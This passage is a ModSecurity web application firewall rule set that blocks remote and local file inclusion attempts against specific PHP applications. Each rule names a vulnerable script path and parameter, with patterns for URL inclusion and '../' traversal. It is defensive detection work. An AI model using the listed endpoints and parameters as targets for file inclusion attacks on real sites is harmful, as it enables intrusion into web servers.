"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008961,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,32705'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:lang/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPmyGallery lang parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008962) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPmyGallery confdir parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /_conf/core/common-tpl-vars.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008962,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPmyGallery confdir parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32705'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:confdir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPmyGallery confdir parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003703) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS phpMyPortal Remote Inclusion Attempt -- articles.inc.php GLOBALS CHEMINMODULES SecRule REQUEST_LINE "@contains /inc/articles.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003703,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS phpMyPortal Remote Inclusion Attempt -- articles.inc.php GLOBALS CHEMINMODULES',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3879'" SecRule &TX:'/RFI.*ARGS:GLOBALS[CHEMINMODULES]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS phpMyPortal Remote Inclusion Attempt -- articles.inc.php GLOBALS CHEMINMODULES',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009051) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPOF DB_AdoDB.Class.PHP PHPOF_INCLUDE_PATH parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /DB_adodb.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009051,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPOF DB_AdoDB.Class.PHP PHPOF_INCLUDE_PATH parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,25541'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:PHPOF_INCLUDE_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPOF DB_AdoDB.Class.PHP PHPOF_INCLUDE_PATH parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003735) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPSecurityAdmin Remote Inclusion Attempt -- logout.php PSA_PATH SecRule REQUEST_LINE "@contains /include/logout.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003735,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPSecurityAdmin Remote Inclusion Attempt -- logout.php PSA_PATH',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23801'" SecRule &TX:'/RFI.*ARGS:PSA_PATH/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPSecurityAdmin Remote Inclusion Attempt -- logout.php PSA_PATH',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002800) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP PHPNuke Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /iframe.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002800,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHP PHPNuke Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.zone-h.org/en/advisories/read/id=8694/'" SecRule &TX:'/RFI.*ARGS:file/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP PHPNuke Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003683) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Turbulence Remote Inclusion Attempt -- turbulence.php GLOBALS tcore SecRule REQUEST_LINE "@contains /user/turbulence.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003683,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Turbulence Remote Inclusion Attempt -- turbulence.php GLOBALS tcore',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23580'" SecRule &TX:'/RFI.*ARGS:GLOBALS[tcore]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Turbulence Remote Inclusion Attempt -- turbulence.php GLOBALS tcore',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002898) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Web Calendar Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /send_reminders.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002898,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Web Calendar Remote File Inclusion Attempt',tag:'web-application-attack',tag:'cve,2005-2717'" SecRule QUERY_STRING|REQUEST_BODY "(?i:includedir=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Web Calendar Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009390) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /chat/dac.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009390,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34213'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:sendChatData "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPizabi dac.php sendChatData Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009892) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP-Paid4Mail RFI attempt SecRule REQUEST_LINE "@contains /home.php?page=http\:" "phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009892,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHP-Paid4Mail RFI attempt ',tag:'web-application-attack',ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP-Paid4Mail RFI attempt ',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003693) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPtree Remote Inclusion Attempt -- cms2.php s_dir SecRule REQUEST_LINE "@contains /plugin/HP_DEV/cms2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003693,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPtree Remote Inclusion Attempt -- cms2.php s_dir',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3860'" SecRule &TX:'/RFI.*ARGS:s_dir/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPtree Remote Inclusion Attempt -- cms2.php s_dir',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003672) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_image_index.php config pathMod SecRule REQUEST_LINE "@contains /mod/image/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003672,rev:8,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_image_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'" SecRule &TX:'/RFI.*ARGS:config[pathMod]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_image_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003673) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liens_index.php config pathMod SecRule REQUEST_LINE "@contains /mod/liens/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003673,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liens_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'" SecRule &TX:'/RFI.*ARGS:config[pathMod]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liens_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003674) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liste_index.php config pathMod SecRule REQUEST_LINE "@contains /mod/liste/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003674,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liste_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'" SecRule &TX:'/RFI.*ARGS:config[pathMod]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_liste_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003675) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_special_index.php config pathMod SecRule REQUEST_LINE "@contains /mod/special/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003675,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_special_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'" SecRule &TX:'/RFI.*ARGS:config[pathMod]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_special_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003676) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_texte_index.php config pathMod SecRule REQUEST_LINE "@contains /mod/texte/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003676,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_texte_index.php config pathMod',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3852'" SecRule &TX:'/RFI.*ARGS:config[pathMod]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PMECMS Remote Inclusion Attempt -- mod_texte_index.php config pathMod',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009073) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_words.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009073,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_words.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009074) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_groups_reapir.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009074,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_groups_reapir.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009075) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion SecRule REQUEST_LINE "@contains /admin/admin_smilies.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009075,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',tag:'web-application-attack',tag:'bugtraq,33103'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:ModName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PNphpBB2 admin_smilies.php ModName parameter Local File inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009168) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion SecRule REQUEST_LINE "@contains /message_class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009168,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,33718'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:pfadhier "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Papoo CMS message_class.php pfadhier Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008687) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /passwiki.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008687,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29455'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:site_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PassWiki site_id Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003660) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt - Headerfile.php System SecRule REQUEST_LINE "@contains /blocks/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003660,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt - Headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt - Headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003661) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_files.php System SecRule REQUEST_LINE "@contains /files/blocks/latest_files.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003661,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_files.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_files.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003662) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_posts.php System SecRule REQUEST_LINE "@contains /forums/blocks/latest_posts.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003662,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_posts.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_posts.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003663) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- groups_headerfile.php System SecRule REQUEST_LINE "@contains /groups/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003663,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- groups_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- groups_headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003664) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- filters_headerfile.php System SecRule REQUEST_LINE "@contains /filters/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003664,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- filters_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- filters_headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003665) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- links.php System SecRule REQUEST_LINE "@contains /links/blocks/links.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003665,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- links.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- links.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003666) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- menu_headerfile.php System SecRule REQUEST_LINE "@contains /menu/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003666,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- menu_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- menu_headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003667) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_news.php System SecRule REQUEST_LINE "@contains /news/blocks/latest_news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003667,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_news.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- latest_news.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003668) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- settings_headerfile.php System SecRule REQUEST_LINE "@contains /settings/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003668,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- settings_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- settings_headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003681) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- users_headerfile.php System SecRule REQUEST_LINE "@contains /modules/users/headerfile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003681,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- users_headerfile.php System',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3853'" SecRule REQUEST_LINE "@contains system[" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Persism CMS Remote Inclusion Attempt -- users_headerfile.php System',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009415) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PhpBlock basicfogfactory.class.php PATH_TO_CODE Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /basicfogfactory.class.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009415,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PhpBlock basicfogfactory.class.php PATH_TO_CODE Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28588'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:PATH_TO_CODE/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PhpBlock basicfogfactory.class.php PATH_TO_CODE Parameter Remote File 